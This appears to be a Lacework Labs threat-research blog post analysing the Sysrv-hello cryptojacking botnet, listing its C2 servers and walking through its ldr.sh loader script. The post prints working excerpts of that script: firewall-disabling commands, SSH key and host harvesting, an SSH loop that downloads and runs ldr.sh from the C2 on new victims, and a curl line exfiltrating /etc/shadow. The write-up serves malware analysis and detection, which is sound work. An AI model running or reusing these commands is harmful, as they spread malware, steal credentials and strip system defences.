
<!doctype html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta http-equiv="cleartype" content="on">

  <link rel="shortcut icon" href="/images/favicon.png">


	<!-- This site is optimized with the Yoast SEO Premium plugin v18.3 (Yoast SEO v19.6) - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Sysrv-Hello Expands Infrastructure</title>
	<meta name="description" content="Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads." />
	<link rel="canonical" href="https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Sysrv-Hello Expands Infrastructure" />
	<meta property="og:description" content="Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads." />
	<meta property="og:url" content="https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/" />
	<meta property="og:site_name" content="Lacework" />
	<meta property="article:published_time" content="2021-04-22T15:00:51+00:00" />
	<meta property="article:modified_time" content="2022-01-31T16:37:02+00:00" />
	<meta property="og:image" content="https://www.lacework.com/wp-content/uploads/2021/04/sys1.png?_t=1668640371" />
	<meta property="og:image:width" content="776" />
	<meta property="og:image:height" content="547" />
	<meta property="og:image:type" content="image/png" />
	<meta name="author" content="Lacework Labs" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@Lacework" />
	<meta name="twitter:site" content="@Lacework" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Lacework Labs" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="11 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#article","isPartOf":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"},"author":{"name":"Lacework Labs","@id":"https://www.lacework.com/#/schema/person/33c7292fb1e2cf551532c61ac1c0e682"},"headline":"Sysrv-Hello Expands Infrastructure","datePublished":"2021-04-22T15:00:51+00:00","dateModified":"2022-01-31T16:37:02+00:00","mainEntityOfPage":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"},"wordCount":1932,"publisher":{"@id":"https://www.lacework.com/#organization"},"image":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage"},"thumbnailUrl":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","articleSection":["Blog","Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/","url":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/","name":"Sysrv-Hello Expands Infrastructure","isPartOf":{"@id":"https://www.lacework.com/#website"},"primaryImageOfPage":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage"},"image":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage"},"thumbnailUrl":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","datePublished":"2021-04-22T15:00:51+00:00","dateModified":"2022-01-31T16:37:02+00:00","description":"Sysrv-hello is a multi-architecture Cryptojacking (T1496) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows 
payloads.","breadcrumb":{"@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#primaryimage","url":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","contentUrl":"https://www.lacework.com/wp-content/uploads/2021/04/sys1.png","width":776,"height":547},{"@type":"BreadcrumbList","@id":"https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.lacework.com/"},{"@type":"ListItem","position":2,"name":"Sysrv-Hello Expands Infrastructure"}]},{"@type":"WebSite","@id":"https://www.lacework.com/#website","url":"https://www.lacework.com/","name":"Lacework","description":"","publisher":{"@id":"https://www.lacework.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.lacework.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.lacework.com/#organization","name":"Lacework","url":"https://www.lacework.com/","sameAs":["https://www.linkedin.com/company/lacework/","https://www.youtube.com/c/lacework","https://twitter.com/Lacework"],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.lacework.com/#/schema/logo/image/","url":"https://www.lacework.com/wp-content/uploads/2022/02/Lacework-Logo.png","contentUrl":"https://www.lacework.com/wp-content/uploads/2022/02/Lacework-Logo.png","width":1200,"height":627,"caption":"Lacework"},"image":{"@id":"https://www.lacework.com/#/schema/logo/image/"}},{"@type":"Person","@id":"https://www.lacework.com/#/schema/person/33c7292fb1e2cf551532c61ac1c0e682","name":"Lacework 
Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.lacework.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/a253ae7f57a9609ea5e66e4d50e67f57?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/a253ae7f57a9609ea5e66e4d50e67f57?s=96&d=mm&r=g","caption":"Lacework Labs"},"url":"https://www.lacework.com/author/lacework-labs/"}]}</script>
	<!-- / Yoast SEO Premium plugin. -->


		  
 
</head>

  <body>

                            <a href="/platform/threat-detection/"><span class="nav-item-eyebrow">CWPP</span>Cloud Workload Protection Platform <span class="nav-item-desc">Monitor workloads continuously for threats</span></a>
                            <a href="/platform/vulnerability-management/">Vulnerability Management <span class="nav-item-desc">Find and fix vulnerabilities in build time and runtime</span></a>
                            <a href="/solutions/audit-compliance/">Cloud Compliance <span class="nav-item-desc">Streamline audits to meet industry standards </span></a>
                          </div>
          </div>
                          <div class="nav-item-primary-dropdown-container pni1-tab2 ">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/platform/aws/">Amazon Web Services (AWS) <span class="nav-item-desc">Simplify security for Amazon Web Services</span></a>
                            <a href="/platform/google-cloud/">Google Cloud <span class="nav-item-desc">Automate security for Google Cloud</span></a>
                          </div>
            <div class="col-right">
                            <a href="/platform/microsoft-azure/">Microsoft Azure <span class="nav-item-desc">Continuously secure Microsoft Azure apps</span></a>
                            <a href="/platform/multicloud/">Multicloud <span class="nav-item-desc">Protection across multicloud and hybrid</span></a>
                          </div>
          </div>
                          <div class="nav-item-primary-dropdown-container pni1-tab3 ">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/platform/deployment/">Data Ingestion   <span class="nav-item-desc">See more with combined agentless and agent-based approach</span></a>
                            <a href="/solutions/integrations/">Integrations <span class="nav-item-desc">Supercharge productivity by integrating with your existing workflows</span></a>
                          </div>
            <div class="col-right">
                            <a href="/platform/polygraph/">Polygraph<sup>&reg;</sup>: Behavioral Analytics Engine  <span class="nav-item-desc">Automatically find and know your normal with our patented machine-learning technology</span></a>
                          </div>
          </div>
                  
                </div>
      
      <!-- End if tabbed nav is true -->
      

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-2">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/solutions">Solutions</a><span class="icon-chevron" data-flyout-trigger="flyout-2"></span></div>
      
                      <div class="tabs">
                              <div class="nav-item-primary-dropdown-tab active-tab" id="pni2-tab1"><i class="fa-duotone fa-industry" style="margin-right: 8px;"></i> Industry & Size</div>
                              <div class="nav-item-primary-dropdown-tab " id="pni2-tab2"><i class="fa-duotone fa-user" style="margin-right: 8px;"></i> User Role</div>
                            </div>

        <div class="tabs-content">
                          <div class="nav-item-primary-dropdown-container pni2-tab1 active">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/solutions/cloud-security-for-healthtech/">HealthTech  <span class="nav-item-desc">Protect healthcare data and demonstrate HIPAA compliance</span></a>
                            <a href="/cloud-security-and-compliance-for-the-gaming-industry/">Gaming <span class="nav-item-desc">Secure player data while speeding game development</span></a>
                          </div>
            <div class="col-right">
                            <a href="/solutions/cloud-security-fintech/">FinTech  <span class="nav-item-desc">Prevent cybercrime with safe financial transactions</span></a>
                            <a href="/solutions/cloud-security-for-startups/">Cloud Security for Startups <span class="nav-item-desc">Automate processes to accelerate small business growth</span></a>
                          </div>
          </div>
                          <div class="nav-item-primary-dropdown-container pni2-tab2 ">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/solutions/security-user/">Security <span class="nav-item-desc">Pinpoint cloud issues, with rich context to act fast</span></a>
                          </div>
            <div class="col-right">
                            <a href="/solutions/developer/">Developer <span class="nav-item-desc">Build faster with continuous security and deep visibility</span></a>
                          </div>
          </div>
                  
                </div>
      
      <!-- End if tabbed nav is true -->
      

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-3">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/customers">Customers</a><span class="icon-chevron" data-flyout-trigger="flyout-3"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Our Customers</h4>
      <div><p>Lacework is trusted by the most innovative companies across the globe.</p>
</div>
              <a class="button button--link" href="/customers">Explore Success Stories</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Customer Success</h5>
          <ul>
                          <li><a href="/customers">Case Studies</a></li>
                          <li><a href="https://academy.lacework.com/" target="_blank">Training:<br/>Lacework Academy</a></li>
                          <li><a href="https://docs.lacework.com/" target="_blank">Product Documentation</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Customer Support</h5>
          <ul>
                          <li><a href="https://support.lacework.com/hc/en-us">Support</a></li>
                          <li><a href="https://login.lacework.net/">Login</a></li>
                          <li><a href="/contact">Contact Us</a></li>
                      </ul>
        </div>
                    
                              
              <div class="flyout__column flyout__column--callout">
          <div class="callout-card">
                          <img src="https://www.lacework.com/wp-content/uploads/2022/03/Pocket-Gems_031022.png" alt="Pocket Gems protects customer data and improves vulnerability detection">
                        <h4>Pocket Gems protects customer data and improves vulnerability detection</h4>
            <a class="button button--link" href="https://info.lacework.com/case-study-pocket-gems.html?utm_source=website&utm_medium=case-studies&utm_campaign=website-resources" target="_blank">Read the Case Study</a>
          </div>
        </div>
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-4">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/partners">Partners</a><span class="icon-chevron" data-flyout-trigger="flyout-4"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Lacework Partner Program</h4>
      <div><p>We are helping our partners build successful and profitable cloud security practices to help meet the adoption of cloud.</p>
</div>
              <a class="button button--link" href="/partners">Learn More</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Channel Partners</h5>
          <ul>
                          <li><a href="/partners">Lacework Partner Program</a></li>
                          <li><a href="/partners/search-partner/">Find a Partner</a></li>
                          <li><a href="https://partners.lacework.com/" target="_blank">Partner Portal - Login</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Strategic Alliances</h5>
          <ul>
                          <li><a href="/partners/strategic-alliances">Lacework Alliances</a></li>
                      </ul>
        </div>
                    
                              
              <div class="flyout__column flyout__column--callout">
          <div class="callout-card">
                          <img src="https://www.lacework.com/wp-content/uploads/2022/04/Lacework_WP_Ransomware_Rising-_040422_V4-resource-card-co-brand-1.png" alt="Get insights into the current ransomware landscape and best practices to reduce your risk.">
                        <h4>Get insights into the current ransomware landscape and best practices to reduce your risk.</h4>
            <a class="button button--link" href="https://info.lacework.com/aws-battle-ransomware-in-cloud?utm_source=website&utm_medium=whitepaper&utm_campaign=website-resources" target="_blank">Learn more</a>
          </div>
        </div>
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-5">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/resources">Resources</a><span class="icon-chevron" data-flyout-trigger="flyout-5"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Resources</h4>
      <div><p>Learn about Lacework&#8217;s modern approach to cloud security with Blogs, Case Studies, Videos, eBooks, Webinars, and White Papers.</p>
</div>
              <a class="button button--link" href="/resources">Explore Resources Library</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Resources & Insights</h5>
          <ul>
                          <li><a href="/blog">Blog</a></li>
                          <li><a href="/customers">Case Studies</a></li>
                          <li><a href="/resources/industry-reports">Industry Reports</a></li>
                          <li><a href="/resources/infographics">Infographics</a></li>
                          <li><a href="/resources/solution-briefs">Solution Briefs</a></li>
                          <li><a href="/resources/videos">Videos</a></li>
                          <li><a href="/resources/ebooks">eBooks</a></li>
                          <li><a href="/resources/whitepapers">White Papers</a></li>
                          <li><a href="/resources/webinars">Webinars</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Training & Documentation</h5>
          <ul>
                          <li><a href="https://academy.lacework.com/" target="_blank">Lacework Academy</a></li>
                          <li><a href="https://docs.lacework.com/" target="_blank">Documentation</a></li>
                      </ul>
        </div>
                    
                              
              <div class="flyout__column flyout__column--callout">
          <div class="callout-card">
                          <img src="https://www.lacework.com/wp-content/uploads/2022/10/Cloud_Threat_Report_Vol4_EN_resource-card.jpg" alt="Get insights into some of the main trends in the cloud threat landscape.">
                        <h4>Get insights into some of the main trends in the cloud threat landscape.</h4>
            <a class="button button--link" href="/resources/industry-reports/cloud-threat-report/">Cloud Threat Report, Volume 4</a>
          </div>
        </div>
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-6">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/about-us/">Company</a><span class="icon-chevron" data-flyout-trigger="flyout-6"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Company</h4>
      <div><p>We are changing the future of cloud security with automation and data so our customers can innovate with speed and safety.</p>
</div>
              <a class="button button--link" href="/about-us">Learn more about Lacework</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Newsroom & Events</h5>
          <ul>
                          <li><a href="/press-releases">Press Releases</a></li>
                          <li><a href="/in-the-news">In the News</a></li>
                          <li><a href="/events">Events</a></li>
                          <li><a href="/awards">Awards</a></li>
                          <li><a href="/media-library/">Media Library</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>People</h5>
          <ul>
                          <li><a href="/about-us/#leadership">Leadership</a></li>
                          <li><a href="/investors">Investors</a></li>
                          <li><a href="/labs/">Lacework Labs</a></li>
                          <li><a href="/careers">Careers</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Responsibility</h5>
          <ul>
                          <li><a href="/legal">Legal</a></li>
                          <li><a href="/privacy-policy">Security & Privacy</a></li>
                          <li><a href="/trust">Trust</a></li>
                      </ul>
        </div>
                    
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
          </header>

    <main class="post-template">
	<section class="hero gradient">
		<div class="wrapper">
			<h1 class="">Sysrv-Hello Expands Infrastructure</h1>
										<p class="author">Lacework Labs</p>
										<p class="date">April 22, 2021</p>
								</div>
	</section>
	<section class="post-template__content">
		<div class="wrapper">
			<p>&nbsp;</p>
<p><strong>Chris Hall and Jared Stroud<br />
Cloud Security Researchers, Lacework Labs</strong></p>
<p>&nbsp;</p>
<p>Sysrv-hello is a multi-architecture Cryptojacking (<a href="https://attack.mitre.org/techniques/T1496/" target="_blank" rel="noopener">T1496</a>) botnet that first emerged in late 2020 and employs Golang malware compiled into both Linux and Windows payloads. The malware is equal parts XMRig cryptominer and aggressive botnet-propagator. The propagator leverages MySQL and Tomcat brute forcing (<a href="https://attack.mitre.org/techniques/T1110/" target="_blank" rel="noopener">T1110</a>) along with a suite of exploits including those for Atlassian and Apache. The malware also leverages several &#8220;No CVE&#8221; command execution techniques including those for Jupyter notebook and Tomcat Manager.</p>
<h2>Key Points</h2>
<ul>
<li>Opportunistic actors are targeting cloud workloads through remote code injection/remote code execution vulnerabilities in <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" target="_blank" rel="noopener">PHPUnit</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0193" target="_blank" rel="noopener">Apache Solr</a>, <a href="https://nvd.nist.gov/vuln/detail/cve-2019-3396" target="_blank" rel="noopener">Confluence</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3129" target="_blank" rel="noopener">Laravel</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-12149" target="_blank" rel="noopener">JBoss</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-11581" target="_blank" rel="noopener">Jira</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-7238" target="_blank" rel="noopener">Sonatype</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-14882" target="_blank" rel="noopener">Oracle WebLogic</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5638" target="_blank" rel="noopener">Apache Struts</a> to gain initial access (<a href="https://attack.mitre.org/techniques/T1190/" target="_blank" rel="noopener">T1190</a>).</li>
<li>Lateral movement is conducted via SSH keys available on the victim machine and hosts identified from bash history files, ssh config files, and known_hosts files. (<a href="https://attack.mitre.org/techniques/T1021/004/" target="_blank" rel="noopener">T1021.004</a>)</li>
<li>Based on the continually expanding C2 infrastructure and the Windows-compatible builds of the malware, further botnet expansion is likely over time.</li>
</ul>
<h2>Botnet Infrastructure</h2>
<p>First documented in early February by <a href="https://help.aliyun.com/document_detail/196163.html">Aliyun</a> as “Sysrv-hello”, the Sysrv-hello botnet has since expanded in both the volume of specimens and its C2 infrastructure. Since early March, five new botnet controllers have been identified, the most recent being IP 194.145.227.21. Most C2 IPs belong to either AS 48693 (Rices Privately owned enterprise) or AS 213035 (Des Capital B.V.).</p>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%; height: 230px;">
<thead>
<tr style="background-color: #e8e8e8;">
<th style="border-style: solid; border-color: #ffffff;" scope="col"><span style="font-weight: 400; padding-left: 5px;">C2</span></th>
<th style="width: 50%; text-align: center; height: 23px;" scope="col"><span style="font-weight: 400; padding-left: 5px;">ASN</span></th>
</tr>
</thead>
<tbody>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">194.145.227.21</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 48693 Rices Privately owned enterprise</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">194.40.243.98</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 48693 Rices Privately owned enterprise</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">31.42.177.123</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 43641 Sollutium EU LLC</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">31.210.20.181</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 213035 Des Capital B.V.</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 4px;">185.239.242.71</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 213035 Des Capital B.V.</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">31.210.20.120</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 213035 Des Capital B.V.</span></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p><img loading="lazy" class="alignnone size-full wp-image-6986" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001.jpg" alt="" width="802" height="772" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001.jpg 802w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001-300x289.jpg 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001-768x739.jpg 768w" sizes="(max-width: 802px) 100vw, 802px" /></p>
<p>&nbsp;</p>
<p>Examination of SSH fingerprint data for the C2s uncovered a total of 26 servers that were likely compromised by Sysrv-hello at some point. One server, 185.76.147.189, was found to have historically used both SSH keys currently in use by Sysrv-hello, indicating they are likely unique to the botnet’s infrastructure. Shodan reports for IPs sharing the SSH keys show an even distribution of <a href="https://www.shodan.io/search?query=41%3Ac3%3A8d%3A22%3Ac1%3A32%3A7c%3A50%3A40%3A96%3A9d%3A1d%3A54%3Afe%3A74%3A86" target="_blank" rel="noopener">CouchDB and Mosquitto/MQTT</a>, so it’s possible these services were exploited by Sysrv-hello actors.</p>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%;">
<thead>
<tr style="background-color: #e8e8e8; border-style: solid; border-color: #fff;">
<td style="width: 33.333333333333336%; text-align: center; border-style: solid; border-color: #ffffff;" scope="row">C2</td>
<td style="width: 33.333333333333336%; text-align: center; border-style: solid; border-color: #ffffff;" scope="row">SSH fingerprint</td>
<td style="width: 33.333333333333336%; text-align: center; border-style: solid; border-color: #ffffff;" scope="row">total servers</td>
</tr>
</thead>
<tbody>
<tr>
<td style="width: 33.333333333333336%;">194.145.227.21</td>
<td style="width: 33.333333333333336%;">41:c3:8d:22:c1:32:7c:50:40:96:9d:1d:54:fe:74:86</td>
<td style="width: 33.333333333333336%;">24</td>
</tr>
<tr>
<td style="width: 33.333333333333336%;">31.210.20.120</td>
<td style="width: 33.333333333333336%;">08:e0:58:cf:13:6f:4e:42:3a:79:a7:14:63:19:0c:ce</td>
<td style="width: 33.333333333333336%;">2</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>There were also indications that the C2 hosts were active participants in the exploitation process. Host 194.145.227.21 runs an open FTP server which, at the time of this writing, hosted a file named cmd.vm. This file is a <a href="https://raw.githubusercontent.com/Yt1g3r/CVE-2019-3396_EXP/master/cmd.vm" target="_blank" rel="noopener">component</a> used in the template injection stage of the Atlassian Confluence Widget Connector exploit (CVE-2019-3396).</p>
<p>Another interesting tactic was the use of custom user-agents specifying the CVE for a given exploit. In the example below, the XML component of the Oracle WebLogic Server RCE included a curl request with the exploit’s CVE as a user-agent. This is strictly supplied for tracking purposes and doesn’t determine the server’s response.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6989" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a.png" alt="" width="801" height="379" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a.png 801w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a-300x142.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a-768x363.png 768w" sizes="(max-width: 801px) 100vw, 801px" /></center>&nbsp;</p>
<h2>Initial Host Infection</h2>
<p>Host infection begins with a bash script (ldr.sh) that performs initial host triage prior to downloading the second stage ELF binary &#8211; sysrv. The initial bash script disables ufw and sets the default policy of the INPUT, OUTPUT and FORWARD <a href="https://ipset.netfilter.org/iptables.man.html" target="_blank" rel="noopener">iptables chains</a> to ACCEPT before flushing any other firewall rules that exist (<a href="https://attack.mitre.org/techniques/T1562/004/" target="_blank" rel="noopener">T1562.004</a>). Next, the ldr script attempts to overwrite content within <span class="inlineCodeBlock">/etc/ld.so.preload</span> (<a href="https://attack.mitre.org/techniques/T1485/" target="_blank" rel="noopener">T1485</a>), as well as remove any static host entries for mining pools stored within <span class="inlineCodeBlock">/etc/hosts</span>.</p>
<pre class="brush: bash; title: ; notranslate" title="">
ufw disable
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F
chattr -ia /etc/ld.so.preload
echo &gt; /etc/ld.so.preload
chattr -ia /etc/hosts
sed -i '/f2pool.com\|nanopool.org\|minexmr.com\|supportxmr.com\|c3pool.com/d' /etc/hosts
</pre>
<p>After killing cryptocurrency miners via process name and removing the Aliyun agent (prevalent in Alibaba cloud environments), the second stage payload is downloaded. The second stage payload hosted on the staging server is prefixed with “sysrv”-ARCHITECTURE, where ARCHITECTURE is obtained via <span class="inlineCodeBlock">uname -m</span>. However, after the file is downloaded, the sysrv binary is renamed based on the output of the command below and then launched.</p>
<p><span class="inlineCodeBlock">sys=$(date |md5sum|awk -v n=”$(date +%s)” ‘{print substr($1,1,n%7+6)}’)</span></p>
<p>The bash script then proceeds to identify SSH private keys within <span class="inlineCodeBlock">~/</span>, <span class="inlineCodeBlock">/root</span> and <span class="inlineCodeBlock">/home</span> to use for lateral movement (<a href="https://attack.mitre.org/techniques/T1021/004/" target="_blank" rel="noopener">T1021.004</a>) against IPv4 addresses identified within the user&#8217;s bash history, <span class="inlineCodeBlock">$USER/.ssh/known_hosts</span> and <span class="inlineCodeBlock">~/.ssh/config</span> files.</p>
<pre class="brush: bash; title: ; notranslate" title="">
KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
</pre>
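<p>In combination with the SSH keys above, a brute force approach of trying every user against every host with every key identified is performed. Users on the victim host are identified via home directories with the <span class="inlineCodeBlock">find</span> command. If authentication is successful, a bash one-liner is executed to download and run the ldr.sh script on the new victim host. The one-liner fetches ldr.sh with the user-agent <span class="inlineCodeBlock">localssh</span>, so outbound curl or wget requests carrying that string are a useful signal when hunting for this propagation stage.</p>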
<pre class="brush: bash; title: ; notranslate" title="">
USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
)
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
    for host in $hostlist; do
        for key in $keylist; do
            chmod +r $key; chmod 400 $key
            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl --user-agent localssh $cc/ldr.sh || wget --user-agent localssh -q -O - $cc/ldr.sh) | sh"
        done
    done
done
</pre>
<p>The Lacework Labs team also identified a curl statement commented out within ldr.sh that would have otherwise exfiltrated the <span class="inlineCodeBlock">/etc/shadow</span> file via a base64 encoded user-agent string to the server hosting ldr.sh and sysrv. In other ldr.sh variants, this command was not commented out and would be executed.</p>
<p><span class="inlineCodeBlock">#curl &#8211;user-agent shell_$(cat /etc/shadow|grep &#8220;\\$&#8221;|base64 -w0) $cc </span></p>
<p>Other ldr.sh scripts examined by the Lacework Labs team had slight differences in functionality. While all observed samples downloaded the 2nd stage payload of sysrv, some did not perform the lateral movement function. The Lacework Labs team assesses with moderate confidence the scripts are actively being modified while keeping the same filename of ldr.sh so that variants already deployed will still grab the hardcoded value of ldr.sh. This claim is supported by variations of ldr.sh being uploaded to <a href="https://www.virustotal.com/gui/url/3dbfc3a9cdf252137ee443462f26ea2fd2c4102b359e331a11ef14f623a13412/relations" target="_blank" rel="noopener">VirusTotal</a>.</p>
